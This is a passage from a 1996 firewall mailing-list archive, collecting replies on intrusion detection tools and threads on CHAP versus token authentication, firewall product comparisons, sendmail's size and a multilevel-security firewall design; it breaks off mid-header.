[version 2.4 PL23] Content-Type: text Content-Length: 1042 Status: RO In some mail from mdr@vodka.sse.att.com, sie said: > > Do you have reach info for Omniguard? not handy, but will see what I can do. > > Omniguard distribute a suite of programs on a single CD-ROM, one of which > > is supposedly an intrusion detection program. I say supposedly because > > I've not had a valid license key to do anything useful with it. > > > > darren > > ==================================================================== From: Jordan Hayes Message-Id: <199601262322.PAA25215@Thinkbank.COM> To: mdr@vodka.sse.att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 356 Status: RO From: mdr@vodka.sse.att.com Subject: Re: intrusion detection To: jordan@thinkbank.com (Jordan Hayes) Do you have a reach number or email address or something to help me reach them? > > There's a group at UC Davis doing this. Jeremy Frank is one of the > people involved. > > /jordan > Try Jeremy Frank ... /jordan ==================================================================== From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Message-Id: <199601262115.QAA17839@bwface.bwh.harvard.edu> Subject: Re: intrusion detection To: mark.riggins@att.com Date: Fri, 26 Jan 1996 16:15:09 -0500 (EST) In-Reply-To: <9601252031.AA04494@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Jan 25, 96 03:34:09 pm X-Pgp: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Content-Length: 745 Status: RO Some of Spaf's students at COAST have papers. Adam ==================================================================== From: gilsinn@cam.nist.gov (Judith F Gilsinn) Message-Id: <9601261446.AA00755@trumpet.cam.nist.gov> To: mdr@vodka.sse.att.com Subject: Intrusion detection mailing list Content-Type: text Content-Length: 281 Status: RO I have a year old reference to an intrusion detection mailing list. Send mail to majordomo@uow.edu.au with subscribe ids in the message body. Since I don't subscribe to this list, I don't know its status, but you might want to try it. Judy Gilsinn NIST Computer Security Officer ==================================================================== From: "Steve Lodin" Message-Id: <9601260941.ZM29056@narnia.cs.purdue.edu> Date: Fri, 26 Jan 1996 09:41:24 -0500 In-Reply-To: Darren Reed "Re: intrusion detection" (Jan 26, 4:41pm) References: <199601260541.VAA07236@miles.greatcircle.com> On Jan 26, 4:41pm, Darren Reed wrote: > > Omniguard distribute a suite of programs on a single CD-ROM, one of which > is supposedly an intrusion detection program. I say supposedly because > I've not had a valid license key to do anything useful with it. > If you are talking about the Axent Omniguard suite of tools, there is a product called Intruder Alert (ITA). I just installed a temporary license for the COAST lab the other day. It looks like a simple syslog watcher from my limited experience with it. Steve -- Steve Lodin Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin Delco Electronics - swlodin@delcoelect.com (317)451-0479 Home - swlodin@iquest.net http://www.iquest.net/~swlodin/ ==================================================================== From: stevenf@goodnet.com (Steven Fullmer) Subject: Re: intrusion detection Content-Type: text/plain; charset="us-ascii" Content-Length: 780 Status: RO CommerceNet at http://www.commerce.net has an electronic jump station. Go to the "security" section and use it as a jumping off point. **was a godd start when I wrote the page 5 months ago???*** ========================================================================= From: K.T.Khoo@iti.salford.ac.uk Date: 26 Jan 96 13:55 Hi, I am a PhD student working on IT security, esp. on PKI, although my interest is on intrusion detection . . . . You may find quite some good papers on the said topic, esp. 'An Application of Pattern Matching in Intrusion Detection' from: http://www.cs.purdue.edu//coast/coast-library.html Do keep in touch. Cheers! Vincent Khoo ==================================================================== From: Darren Reed Subject: Re: intrusion detection Omniguard distribute a suite of programs on a single CD-ROM, one of which is supposedly an intrusion detection program. I say supposedly because I've not had a valid license key to do anything useful with it. darren ==================================================================== From: Ron DuFresne To: mdr@vodka.sse.att.com Mark, You prolly have already done so, but you can do a web search on 'mitnick' and come up with tons of info, don't expect much from yahoo, but lycos will keep you busy for a full day at least. And not all the info is mitnick oriented. Also, you may wish to exchange some private mails with Ray Kaplan fromt eh list here, he has some very good insites as to this perspective. In the same token, I would be interested in seeing the 'workbench' you are able to piece together. Thanks, my best to you and yours, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ==================================================================== From: garland@gatekeeper.cb.att.com To: mark.riggins@att.com Hi Mark, Intrusion detection... here are a few quick notes. These are all public domain. more details available upon request, including URLs. sorry for the terse message. I am on an rather convoluted link, that includes dialup from a hotel, ppp, an Internet connection, and a GUARD connection into AT&T. COPS by Dan Farmer is a reasonable system scanner. tiger is another similar tool. tripwire, with md5, and binaudit scan for changes to the file system. swatch is a tool that analyzes log files. There are a few other tools that scan a system from the outside. They are basically portscanners, with some intelligence build in. ISS, nfsbug, SATAN are examples. Chris ==================================================================== From: swlodin@cs.purdue.edu (Steve Lodin) Message-Id: <199601260243.VAA27520@narnia.cs.purdue.edu> Subject: Re: intrusion detection This may be obvious, but have you checked the COAST Archive? I know we have about 5 IDS papers there. Check the COAST Web page also (http://www.cs.purdue.edu/coast) because the group is working on a project called IDIOT (Intrusion Detecion In Our Time). Alternatively, there has been much IDS research at UC Davis. Steve -- Steve Lodin Purdue - swlodin@cs.purdue.edu http://www.cs.purdue.edu/people/swlodin Delco Electronics - swlodin@delcoelect.com (317)451-0479 Home - swlodin@iquest.net http://www.iquest.net/~swlodin/ ==================================================================== From: Jordan Hayes Message-Id: <199601260153.RAA15092@Thinkbank.COM> To: mdr@vodka.sse.att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 94 Status: RO There's a group at UC Davis doing this. Jeremy Frank is one of the people involved. /jordan ==================================================================== Have you tried looking at the ids list? ids@uow.edu.au (use the -request form to subscribe). Ben. ____ Ben Samman..............................................samman@cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman@powered.cs.yale.edu for key Want to give a soon-to-be college grad a job? Mail me for a resume ==================================================================== From: Jim Cannady Subject: Re: Network Intrusions Content-Type: text/plain; charset="us-ascii" Content-Length: 2022 Status: RO Hi Mark, Yeah, I got more reference material than my desk can stand at the moment!! I've been collecting this stuff for the past couple of years, and I'm sure that I've got close to everything that's been published on the topic in a refereed journal. Let me know your specifics and I'll see what I can find. Jim >> ================================== >> James Cannady | >> Research Scientist | >> Georgia Institute of Technology | >> GTRI/ITL/CSITD | >> James.Cannady@gtri.gatech.edu | >> (404) 894-9730 | >> ================================== ==================================================================== From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9511292047.AA10059@hosaka.smallworks.com> To: cibir@netcom.com Subject: Re: Intruder & Analysis Software Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Content-Type: text Content-Length: 47 Status: RO 'Stalker' from Haystack Labs, in Austin, TX From firewalls-owner Fri Feb 2 14:40:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA19393 for firewalls-outgoing; Fri, 2 Feb 1996 13:51:47 -0800 (PST) Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA19358 for ; Fri, 2 Feb 1996 13:51:11 -0800 (PST) Received: from qmgate.mitre.org (qmgate.mitre.org [129.83.100.120]) by mbunix.mitre.org (8.6.10/8.6.9) with SMTP id QAA20413 for ; Fri, 2 Feb 1996 16:49:51 -0500 Message-ID: Date: 2 Feb 1996 16:46:33 -0500 From: "Dan Vukelich" Subject: Survey To: "Firewalls Great Circle" X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subject: Time:4:48 PM OFFICE MEMO Survey Date:2/2/96 I'm new to the firewalls list, so please bear with me. First, I'm looking for is an independent study of firewall products, with columns such as "provides packet filtering," "supports IPX," etc. Second, several years back, a government or educational site was (ab)used as an FTP dumping ground for such things as pornography and bootlegged software; does anyone recall this or have any information they can pass on to me? Danny From firewalls-owner Fri Feb 2 14:55:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA19878 for firewalls-outgoing; Fri, 2 Feb 1996 14:11:59 -0800 (PST) Received: from uucp-1.csn.net (uucp-1.csn.net [199.117.27.26]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA19854 for ; Fri, 2 Feb 1996 14:11:11 -0800 (PST) Received: from bacchus.UUCP (uucp@localhost) by uucp-1.csn.net (8.6.12/8.6.12) with UUCP id PAA24532 for greatcircle.com!Firewalls; Fri, 2 Feb 1996 15:09:05 -0700 From: Shawn Steele Message-Id: <9602021504.ZM20514@aob.org> Date: Fri, 2 Feb 1996 15:04:47 -0700 In-Reply-To: firewalls-digest-owner@greatcircle.com "Firewalls-Digest V5 #78" (Feb 1, 2:00pm) References: <199602012200.OAA02128@miles.greatcircle.com> X-Mailer: Z-Mail Lite (3.2.0 26may94) To: Firewalls@greatcircle.com Subject: Re: Scanning from afar... Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone seen this type of network scanning before? Addresses have > been changed to protect the inocent and the guilty. > > Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp > X.X.143.14(39620) -> X.X.211.227(80), 1 packet Maybe its a webbot gone mad that wants to index the web REALLY thoroughly. I wonder why they're only checking every 16th machine? - shawn Shawn Steele Webmaster Information Systems Administrator Association of Brewers (303) 447-0816 x 118 (voice) 736 Pearl Street (303) 447-2825 (fax) PO Box 1679 shawn@aob.org (e-mail) Boulder, CO 80306-1679 info@aob.org (aob info) U.S.A. http://www.aob.org/aob (web) Note: When replying to my messages, please include enough of my message so that I know what you're replying to! :-) From firewalls-owner Fri Feb 2 15:53:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA24491 for firewalls-outgoing; Fri, 2 Feb 1996 15:31:36 -0800 (PST) Received: from [198.102.244.97] (pb520-ppp.greatcircle.com [198.102.244.97]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA24465; Fri, 2 Feb 1996 15:31:26 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 2 Feb 1996 18:31:47 +0100 To: Ray Hooker , "'Firewall Mailing List'" From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Does SMTP allow security breaches. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:14 PM 1/31/96, Ray Hooker wrote: >The best way to answer the question about SENDMAIL is to simply point to >the fact that the program is like 6000 lines long and has a long history of >problems. I _wish_ it was only 6000 lines long... Try more like 30,000, last I checked... I don't know if it's gotten longer or shorter lately. -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Fri Feb 2 16:24:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA28094 for firewalls-outgoing; Fri, 2 Feb 1996 16:11:26 -0800 (PST) Received: from wicked.neato.org (wicked.neato.org [198.70.96.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA28076 for ; Fri, 2 Feb 1996 16:11:16 -0800 (PST) Received: (from george@localhost) by wicked.neato.org (8.7.2/8.6.12) id QAA07610; Fri, 2 Feb 1996 16:11:28 -0800 (PST) Date: Fri, 2 Feb 1996 16:11:28 -0800 (PST) Message-Id: <199602030011.QAA07610@wicked.neato.org> From: George Mullins To: mjr@v-one.com cc: firewalls@greatcircle.com Subject: Re: SSL and S-HTTP Proxy Status (as of 11 January 1996) In-Reply-To: <199601300002.TAA21978@clark.net> References: <199601291747.MAA02785@argon.ncsc.mil> <199601300002.TAA21978@clark.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus J. Ranum writes: > David P. Kemp > > >So, I sympathize with the sentiment that TIS should either put some > >effort into maintaining fwtk, or release it so that a net-fwtk could > >be maintained by the user community. > > Wait a minute -- are you asking TIS to keep spending money > to keep giving you free firewalls? > No I don't think that is what he is asking. I think that David was saying that if TIS isn't planning on doing anything further with the toolkit then why don't they release the code into the public domain or copy-left and let the community support it - after all it was (at least partly) developed under a DARPA contract at TAX PAYERS expense and should therefore belong to the TAX PAYERS and not TIS. > I just want to make sure that's what you're asking. Because > I have been thinking of moving to a big house in the countryside, > with space for a darkroom, and I think it's only fair that you help > chip in on my mortgage. Because it would be ever so convenient for > me not to have to pay it myself. I just want to make sure what you're say. TIS built this nice big house in the country with space for a nice office where they could do business and the government paid them to build the house and now they decide who will use the house and how. While it seemed awfully magnanimous that TIS was giving away the toolkit, it seems that under the DARPA contract they had to give it away - not because they were just nice guys - and at the same time they could restrict use of the code to non-competitive/non-commercial products. Seems like a pretty good deal that TIS got given by DARPA. -george From firewalls-owner Fri Feb 2 16:38:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA28009 for firewalls-outgoing; Fri, 2 Feb 1996 16:10:24 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA27988 for ; Fri, 2 Feb 1996 16:10:17 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id PAA16376; Fri, 2 Feb 1996 15:36:35 -0800 Date: Fri, 2 Feb 1996 15:36:32 -0800 (PST) From: Bob Bosen Subject: Re: CHAP Authentication To: nicholscs@agedwards.com cc: firewalls@greatcircle.com In-Reply-To: <1996Feb02.132500.1093.27907@igate.agedwards.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 2 Feb 1996 nicholscs@agedwards.com wrote: > > This is a general security related question relating to incoming > communications into a router. Specifically a remote user dialing into a > router attached to an applications server. > > I have to make an argument comparing/contrasting the security levels between > CHAP authentication and Token Authentication. The argument has been > successfully made that Token authentication is generally considered to > provide superior authentication. From a management viewpoint the question > becomes - CHAP is basically free (manhours and implementation) vs. Token > which can be expensive - therefore tell us why CHAP is inferior to Tokens > for perimeter security? > > What threats does CHAP pose? Has CHAP been successfully penetrated? By > what methods? > > I have read the RFC's on PPP and Authentication but am still unable to apply > this to a real world threat. > > Thanks, > > Chris > nicholscs@agedwards.com > > > > > Chap is usually implemented to provide "node" authentication. It gives a reliable indication of the node from which an access request originates (or the nearest link in some cases. ) You can generally determine whether chap goes beyond node authentication by asking yourself this question: "Does the authorized user get personally involved in this CHAP signon (by entering a PIN or somesuch) every time access is requested?" If the answer to that question is "no", then your CHAP implementation is probably being performed automatically by the routers or commserver equipment involved at both ends of the links being authenticated. This is the usual and conventional way that CHAP has come to be used. "Token-based" authentication is generally much more personal. The individual user is directly involved in operating the authenticator and usually has to enter a PIN or at least an additional password, every time. You know he's there, alive and thinking. It's less convenient, but more secure. Now let's look at a typical scenario: Suppose your Commserver implements CHAP authentication transparently and you allow your employees to telecommute into your LAN. Now suppose one or more of your employees has teenaged kids that know how to operate a computer. When your router authenticates your employee's computer in his home, it can't tell whether it's your employee or his teenaged sibling knocking on the door. Now suppose your employee has a LAN in his home. How good is that security? Does his LAN reach out to other LANs? Can his modem slip or ppp out to a commercial Internet provider? Have you just joined your corporate network with the entire world? With the usual transparent CHAP implementations, you should probably be worrying about all of the above. With token-based authentication, you can reasonably tell your employee that every time a session begins between your corporate LAN and his PC (or home LAN), you know he will be personally present, and you can hold him personally responsible for the reasonable activities he is expected to perform, until he takes the link down. If he also uses that token when at the office, you can be reasonably sure he'll keep it with him wherever he goes. That will deny access to your LAN from his kids or from whoever can hop through his PC while he's not there. That's the way I see it (and I'm biased!) Regards, Bob Bosen Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA Tel: +1 510 827-5707 Internet: bbosen@netcom.com http://www.safeword.com ftp://ftp.safeword.com/download/ ************************************************************************** * "It wasn't me!!! Somebody must have captured my username/password!!!" * ************************************************************************** From firewalls-owner Fri Feb 2 17:38:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA02868 for firewalls-outgoing; Fri, 2 Feb 1996 17:30:15 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA02854; Fri, 2 Feb 1996 17:30:10 -0800 (PST) Received: by gauntlet-1.trusted.com; id UAA25021; Fri, 2 Feb 1996 20:35:46 -0500 Received: from hilo.trusted.com(10.0.1.126) by gauntlet-1.trusted.com via smap (V3.1) id xma025017; Fri, 2 Feb 96 20:35:26 -0500 Received: from localhost by hilo.trusted.com with SMTP (1.37.109.4/16.2) id AA17428; Fri, 2 Feb 96 20:28:20 -0500 Message-Id: <9602030128.AA17428@hilo.trusted.com> To: Brent@greatcircle.com (Brent Chapman) Cc: firewalls@greatcircle.com Subject: Re: Does SMTP allow security breaches. In-Reply-To: Your message of "Fri, 02 Feb 1996 18:31:47 EST." Date: Fri, 02 Feb 1996 20:27:55 EST From: "Rick Murphy" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I _wish_ it was only 6000 lines long... Try more like 30,000, last I >checked... I don't know if it's gotten longer or shorter lately. Sendmail 8.7.1 is over 40,000 lines. :-( -Rick From firewalls-owner Sat Feb 3 05:08:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA22937 for firewalls-outgoing; Sat, 3 Feb 1996 04:57:06 -0800 (PST) Received: from vent.pipex.net (vent.pipex.net [158.43.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA22930 for ; Sat, 3 Feb 1996 04:57:01 -0800 (PST) Received: from unknown by vent.pipex.net (8.6.12/PIPEX simple 1.20) id MAA02320; Sat, 3 Feb 1996 12:55:56 GMT Message-ID: In-Reply-To: <9602021310.AA16539@london.csd.harris.com> References: Conversation with last message <9602021310.AA16539@london.csd.harris.com> To: Firewall List MIME-Version: 1.0 From: Ian Johnstone-Bryden Subject: Re: Most Secure Unix? Date: Sat, 03 Feb 96 13:02:59 GMT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yesterday, someone sent an email intended for me but addressed to the list by accident. This prompted a technician from a Harris overseas subsidiary to post a response back to the list. I sent appropriate email to both parties privately and would have left it there but, on reflection, the incident does have some lessons which may be of general interest to the list. The person intending to email me used a mail package at a site he was visiting, rather than waiting to use the trusted system he is familiar with. It looks like a bug in the mail application reselected the 'firewalls' address from a posting extract I had fwd but equally it could have been a human mistake. That is being looked at because the site owner has had other incidents where mail has been re-addressed before leaving his site. The site from which the email came has a typical firewall. The first lesson may therefore be that some fairly common problems cannot be caught by the firewall but could result in significant damage to the enterprise. Hostile attack from the outside is only one risk facing email users and, although it can be very damaging, is a very low probability against other risks. The other lesson may be from the Harris response. Making a reply to a fragment of a larger discussion can result in an out of context response. The implication of the Harris response is that Nighthawk with CyberGuard is really only going to cost a few thousand dollars. In the context of the wider discussion, Nighthawk with CyberGuard, and a number of other products were compared functionally and financially against a specific requirement and a better solution was achieved at considerably lower cost. As was pointed out in the accidental posting, these products were good products, just over priced for the particular requirement. Price was not however the only criteria and was in this particular case of secondary importance. A refreshing change to see a user identifying his potential problems, producing a function requirement, and then selecting the most appropriate solutions before moving to a financial analysis of each proposal which met the functional specification - that maybe a lesson in its own right. The fact that Nighthawk/Cyberguard, or any other product, was under spefication and over priced in one situation doesnt mean that it cant be the best value in another, but you need to understand the relative specifications to know that. Harris suffers a set of problems which are not unique. Their computer systems operation has a tradition of producing highly specified hardware for aerospace and defence applications, particularly real-time OS and Ada niches. That has two commercial impacts. Firstly the niche markets traditionally have been very small and very specialised. Secondly, the niche markets have also been very demanding and this has required very heavy R&D costs and additional production costs. The resulting product is very good if your requirement is similar to the target niche market requirements. Inevitably it results in a significant increase in retail unit cost. If your requirement is for a system which you can mount in a military aircraft and fly through a radiation/EMP zone, buying a specialised product designed for this is actually much cheaper than buying a stack of Intel boxes. If a vendor is producing software independent of hardware, it really doesnt matter because those users who require an armour plated multi-processor machine can find a suitable platform, and those who can meet their requirements with a commodity priced PC clone can also find a suitable platform (or any point between the two extremes), in both cases mounting the same software. Obviously a company, such as Harris, is at a disadvantage because the primary reason to market is to sell hardware and the hardware may not offer best value in a specific requirement set. IMHO such a vendor has two options. One is to concentrate on those niches where the hardware specification makes their hardware good value for money. The other is to concentrate on building platform independent software. There is no margin in trying to market a product which is over priced as a result of being over specified in particular markets. Ian J-B > > > > > Ian: > > > > well they are good products. The problem is that the systems are just > > TCP./IP firewalls and cost an arm and a leg. Most of the night hawks > > come in for around 100K. > > > > If we compete with them, we'll always have a good margin. > > > > Leroy > > > Leroy, > > I suspect that this was sent to firewalls in error, but some confusion needs > to be cleared up now that it has. > > The Harris Night Hawk is a symmetric multiple processing computer, > the price varying according to configuration. > > The CyberGuard (Harris' firewall product) comes in for considerably less > than 100K. > > > Regards > > Jon From firewalls-owner Sat Feb 3 07:08:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA26760 for firewalls-outgoing; Sat, 3 Feb 1996 06:58:14 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA26755 for ; Sat, 3 Feb 1996 06:58:10 -0800 (PST) Received: from pm4-13.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA12293; Sat, 3 Feb 96 09:56:31 -0500 Date: Sat, 3 Feb 96 09:56:31 -0500 Message-Id: <9602031456.AA12293@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Dan Vukelich" From: Frank Willoughby Subject: Re: Survey Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 04:46 PM 2/2/96 -0500, Dan Vukelich wrote: 8< [snip] >First, I'm looking for is an independent study of firewall products, with >columns such as "provides packet filtering," "supports IPX," etc. 8< [snip] Danny, Here's four sources for you to check out: 1) CSI (Computer Security Institute) put out a firewall comparision chart in the Spring 1995 Computer Security Journal (Volume XI, Number 1) They sponsor seminars & conferences on Information Security. FWIW, they are sponsoring a Network Security (NETSEC) conference in early June. I understand that the topic of firewalls crops up a couple of times in their agenda. You can contact them at: (415) 905-2626 for subscription and membership information. 2) Info Security News put out an article entitled "Shopping for Firewalls". The article has a small chart which compares 26 different vendors. This is a good magazine about Information Security. Many of the vendors who are listed in their brief comparison are including a reprint of the article in their brochures. Contact Info Security News at: (508) 879-9792 for subscription information. 3) The Free Internet Firewall Checklist is @150 lines in a spreadsheet which may be used in evaluating firewalls. It is easily modifiable so that you can put in evaluation criteria which are important to *you*. It is free (nice price) and available from Fortified Networks: http://www.fortified.com/fortified 4) The Internet Firewall Evaluator is available from Fortified Networks. Good stuff (but then I am somewhat biased). Further information about this can be found at: http://www.fortified.com/fortified NOTES: Items 1 & 2 are a brief comparison of the vendor's products - based on information which the vendors have supplied. Items 3 & 4 provide the questions in a spreadsheet for for an easy comparison of firewall vendors based on criteria which are important to *you*. The most important criteria in evaluating firewalls are *your* criteria. Decide the value of the data/networks to be protected, the level of protection you want and how much you are willing to spend to provide this protection. Use this as your first step in sifting through the vendors. FWIW, if it was me (which it isn't) and I had a requirement that needed people to access my internal systems from the Internet (ftp, telnet, e-mail, etc), I wouldn't touch any product which didn't offer user->firewall encryption. Sadly, only a handful of vendors which offer this capability. I hope the above information was useful to you. Good luck in selecting the right firewall for your company. >Danny Best Regards, Frank The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Sat Feb 3 07:42:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA27650 for firewalls-outgoing; Sat, 3 Feb 1996 07:35:09 -0800 (PST) Received: from server. ([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA27631 for ; Sat, 3 Feb 1996 07:35:04 -0800 (PST) Received: from demo2.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id KAA12472 for ; Sat, 3 Feb 1996 10:33:51 -0500 Message-ID: <3113806B.199B@fc.com> Date: Sat, 03 Feb 1996 10:34:03 -0500 From: "Douglas M. Todd, Jr." Organization: fc.com X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: I am looking for someone in the Mass Area who is an expert Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk at ip routing? Does anyone have any connections? Douglas Todd -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Douglas M. Todd, Jr. fc.com, Inc. One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Sat Feb 3 09:38:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA01303 for firewalls-outgoing; Sat, 3 Feb 1996 09:22:58 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA01298 for ; Sat, 3 Feb 1996 09:22:52 -0800 (PST) Received: by garrison.com. (4.1/Nutered Mailer) id AA11917; Sat, 3 Feb 96 11:19:37 CST Date: Sat, 3 Feb 96 11:19:37 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602031719.AA11917@garrison.com.> To: firewalls@greatcircle.com, jgt10@amdahl.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Jermoie Jackson wrote: > > I would propose a different use for the MLS architecture. > > > > > > outside---o.proxies----i.proxies-----inside > > > > > > o.proxies have level of '1'. > > i.proxies have level of '2'. > > > > > > o.proxies do not have access to write to the inside ethernet interface. > > i.proxies have priviledge to read o.proxies based on label being > > dominant. > > > > From what I see, this would make a connection-based attack useless. > > You could break into the firewall and subvert the o.proxies. Data-based > > attacks could potentially succeed if neither proxies noticed the signature. > > Connection based attacks would be limited to harming the level '1' environment. > > > > I would be interested in hearing comments... > jgt10@amdahl.com wrote: > About 4 years ago I worked with a group of engineers to design an > internet firewall using a B1 operatin system. We thought of the > above idea, almost exactly. > > level > > SYSHI - audit data, sources > > RESTRICTED - sys admin sources, tools > > USER - Acces to internal network, > > NETWORK - Access to external/internet > > SYSTEM - Executables, configurations, reference data > > The more we looked at how to implement that architecture and > provide other user services the more complicated the picture became. > We knew we would have to re/train the users in MLS concepts and what > new functions they would need to understand and use to get data from > one level to another. In a firewall situation, one that does not require users on the box, how do you see such a model being implemented? With the fully transparent products in the market now, if they were to support an MLS architecture like the above, I believe you would have a higher level of integrity of the box. Attacks that were successful would severly be dampered in reguards to network threats, (as outside processes cannot speak to internal sides of the IP stack). The MLS architecture appears to be a much more bullet-proof mechanism to implement containment (in comparrison to chroot() setuid()). Would be very interested to hear your comments... Jeromie Jackson Director of Technology Garrison Associates jeromie@garrison.com From firewalls-owner Sat Feb 3 12:38:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA06259 for firewalls-outgoing; Sat, 3 Feb 1996 12:29:40 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA06254 for ; Sat, 3 Feb 1996 12:29:37 -0800 (PST) Received: from pferguso-pc.cisco.com (c2robo5.cisco.com [171.68.13.37]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id MAA22661 for ; Sat, 3 Feb 1996 12:12:53 -0800 Message-Id: <199602032012.MAA22661@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 03 Feb 1996 15:13:36 -0500 To: firewalls@GreatCircle.com From: Paul Ferguson Subject: CNN on Mitnick Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For what its worth, CNN had a 5 minute segment on two books which are in print about Tsutomu Shimomura and Kevin Mitnick. See: http://www.cnn.com/CNN/Programs/CompConn/index.html - paul -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sat Feb 3 12:53:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA06167 for firewalls-outgoing; Sat, 3 Feb 1996 12:27:51 -0800 (PST) Received: from westie.gi.net (westie.gi.net [198.247.250.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA06141 for ; Sat, 3 Feb 1996 12:27:44 -0800 (PST) Received: (from alan@localhost) by westie.gi.net (8.7.1/8.7.1) id 